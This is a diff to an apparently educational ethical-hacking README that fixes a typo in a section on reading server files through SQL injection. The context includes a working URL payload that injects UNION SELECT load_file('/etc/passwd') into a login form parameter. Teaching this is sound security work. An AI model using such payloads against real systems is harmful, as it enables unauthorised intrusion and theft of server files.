RodgerOliver/ethical-hacking/README.md

 #### Read and Write Files On The Server

 With these functions the database can read and write files on the server.
-To see the perform:
+To see it perform:

 `https://page.com/login.php?username=hello' UNION SELECT null,load_file('/etc/passwd'),null,null,null %23&password=world`